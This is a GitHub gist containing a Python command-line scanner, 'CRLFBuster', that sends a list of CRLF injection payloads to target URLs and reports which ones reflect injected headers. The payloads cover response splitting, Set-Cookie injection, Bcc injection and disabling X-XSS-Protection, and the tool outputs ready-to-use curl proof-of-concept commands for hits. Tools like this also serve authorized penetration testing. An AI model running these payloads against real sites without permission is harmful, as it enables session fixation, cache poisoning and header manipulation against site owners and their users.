Created
July 26, 2024 13:39
-
-
Save queencitycyber/b0c2fb2cf965c47e1f8907433b9d5df9 to your computer and use it in GitHub Desktop.
identify and exploit potential CRLF injection vulnerabilities in web applications
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
```python | |
import asyncio | |
import aiohttp | |
from typing import List, Dict | |
import click | |
from rich.console import Console | |
from rich.progress import Progress | |
from rich.table import Table | |
import json | |
import re | |
console = Console() | |
CRLF_PAYLOADS = [ | |
"%0D%0A", | |
"%0D%0AContent-Length:%200%0D%0A%0D%0AHTTP/1.1%20200%20OK", | |
"%0D%0ASet-Cookie:%20malicious=1", | |
"%0D%0ABcc:%[email protected]", | |
"%0D%0AUser-Agent:%20Malicious%0D%0A", | |
"%0D%0AX-XSS-Protection:%200", | |
] | |
class CRLFBuster: | |
def __init__(self, urls: List[str], show_poc: bool): | |
self.urls = urls | |
self.show_poc = show_poc | |
async def test_single_url(self, url: str, session: aiohttp.ClientSession) -> Dict: | |
result = {"url": url, "vulnerable": False, "details": [], "poc": []} | |
try: | |
for payload in CRLF_PAYLOADS: | |
test_url = f"{url}?inject={payload}" | |
async with session.get(test_url, allow_redirects=False) as response: | |
headers = dict(response.headers) | |
if any(payload.strip('%0D%0A') in str(v) for v in headers.values()): | |
result["vulnerable"] = True | |
result["details"].append(f"CRLF injection succeeded with payload: {payload}") | |
result["poc"].append(f"curl -i '{test_url}'") | |
break | |
except Exception as e: | |
result["details"].append(f"Error: {str(e)}") | |
return result | |
async def test_urls(self) -> List[Dict]: | |
async with aiohttp.ClientSession() as session: | |
tasks = [self.test_single_url(url, session) for url in self.urls] | |
results = [] | |
with Progress() as progress: | |
task = progress.add_task("[cyan]Testing URLs...", total=len(self.urls)) | |
for future in asyncio.as_completed(tasks): | |
result = await future | |
results.append(result) | |
progress.update(task, advance=1) | |
return results | |
def display_results(self, results: List[Dict]): | |
table = Table(title="CRLF Injection Scan Results") | |
table.add_column("URL", style="cyan") | |
table.add_column("Vulnerable", style="magenta") | |
table.add_column("Details", style="green") | |
if self.show_poc: | |
table.add_column("PoC", style="yellow") | |
for result in results: | |
if result["vulnerable"]: | |
vulnerable = "Yes" | |
details = "\n".join(result["details"]) | |
if self.show_poc: | |
poc = "\n".join(result["poc"]) | |
table.add_row(result["url"], vulnerable, details, poc) | |
else: | |
table.add_row(result["url"], vulnerable, details) | |
console.print(table) | |
def save_results(self, results: List[Dict], output_format: str): | |
if output_format == 'json': | |
with open('crlf_results.json', 'w') as f: | |
json.dump(results, f, indent=2) | |
elif output_format == 'text': | |
with open('crlf_results.txt', 'w') as f: | |
for result in results: | |
if result["vulnerable"]: | |
f.write(f"URL: {result['url']}\n") | |
f.write(f"Vulnerable: Yes\n") | |
f.write(f"Details: {', '.join(result['details'])}\n") | |
if self.show_poc: | |
f.write(f"PoC: {', '.join(result['poc'])}\n") | |
f.write("\n") | |
console.print(f"Results saved to crlf_results.{output_format}") | |
@click.command() | |
@click.option('--url', help='Single URL to test') | |
@click.option('--file', type=click.File('r'), help='File containing URLs to test') | |
@click.option('--poc', is_flag=True, help='Output PoC curl commands') | |
@click.option('--output', type=click.Choice(['json', 'text']), help='Output format for results') | |
def main(url, file, poc, output): | |
if url: | |
urls = [url] | |
elif file: | |
urls = [line.strip() for line in file if line.strip()] | |
else: | |
console.print("[bold red]Please provide either a URL or a file containing URLs.[/bold red]") | |
return | |
buster = CRLFBuster(urls, poc) | |
results = asyncio.run(buster.test_urls()) | |
buster.display_results(results) | |
if output: | |
buster.save_results(results, output) | |
if __name__ == "__main__": | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment